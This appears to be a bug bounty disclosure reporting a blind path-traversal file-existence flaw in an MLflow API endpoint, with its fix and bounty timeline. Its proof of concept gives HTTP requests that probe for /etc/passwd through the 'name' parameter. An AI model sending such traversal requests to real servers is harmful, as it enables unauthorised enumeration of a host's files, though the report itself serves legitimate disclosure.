Blind LFI in register-model/get?name= in mlflow/mlflow


Reported on

Mar 3rd 2023


A blind LFI exists in /ajax-api/2.0/mlflow/registered-models/get?name=

The response from the server is different depending on if the file exists on the local file system or not. When the arbitrary local file exists, the server responds with 500 INTERNAL SERVER ERROR and when it doesn't exist it returns a 404 NOT FOUND response.

Proof of Concept

GET /ajax-api/2.0/mlflow/registered-models/get?name=../../../../../../../../../etc/passwd HTTP/1.1

Returns 500 INTERNAL SERVER ERROR because /etc/passwd exists in the server.

GET /ajax-api/2.0/mlflow/registered-models/get?name=../../../../../../../../../etc/doesNotExist

Returns 404 NOT FOUND because /etc/doesNotExist isn't a file on the local filesystem.


Allows attackers to enumerate files and services on the local operating system hosting the MLflow server.

We are processing your report and will contact the mlflow team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a exists a year ago
Pavlos validated this vulnerability a year ago

Validated privately

danmcinerney has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Pavlos marked this as fixed in 2.2.2 with commit 63ef72 a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago
to join this conversation